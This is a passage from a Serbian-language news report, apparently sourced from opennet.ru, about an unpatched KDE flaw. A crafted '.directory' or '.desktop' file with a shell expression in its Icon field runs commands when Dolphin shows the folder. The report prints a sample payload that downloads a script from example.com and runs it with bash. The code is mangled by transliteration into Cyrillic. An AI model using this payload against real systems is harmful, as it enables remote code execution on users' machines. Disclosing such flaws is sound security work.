У КДЕ-у , који омогућава нападачу да изврши произвољне команде када корисник прегледа директоријум или архиву која садржи специјално дизајниране датотеке „.десктоп“ и „.дирецтори“. Напад захтева да корисник једноставно погледа листу датотека у Долпхин менаџеру датотека, преузме злонамерну датотеку на радној површини или превуче пречицу на радну површину или у документ. Проблем се манифестује у тренутном издању библиотека и старије верзије, до КДЕ 4. Рањивост је и даље присутна (ЦВЕ није додељен).
Проблем је узрокован неисправном имплементацијом класе КДесктопФиле, која, приликом обраде променљиве „Ицон“, без одговарајућег избегавања, прослеђује вредност функцији КЦонфигПривате::екпандСтринг(), која врши проширење специјалних знакова љуске, укључујући обраду стрингови „$(..)“ као команде које треба извршити. Супротно захтевима КСДГ спецификације, имплементација конструкције љуске се производе без одвајања типа подешавања, тј. не само при одређивању командне линије апликације која треба да се покрене, већ и приликом навођења икона које се подразумевано приказују.
На пример, да нападне пошаљите кориснику зип архиву са директоријумом који садржи датотеку „.дирецтори“ као што је:
[Унос за десктоп]
Типе=Дирецтори
Икона[$е]=$(вгет${ИФС}хттпс://екампле.цом/ФИЛЕНАМЕ.сх&&/бин/басх${ИФС}ФИЛЕНАМЕ.сх)
Када покушате да погледате садржај архиве у Долпхин менаџеру датотека, скрипта хттпс://екампле.цом/ФИЛЕНАМЕ.сх ће бити преузета и извршена.
Извор: опеннет.ру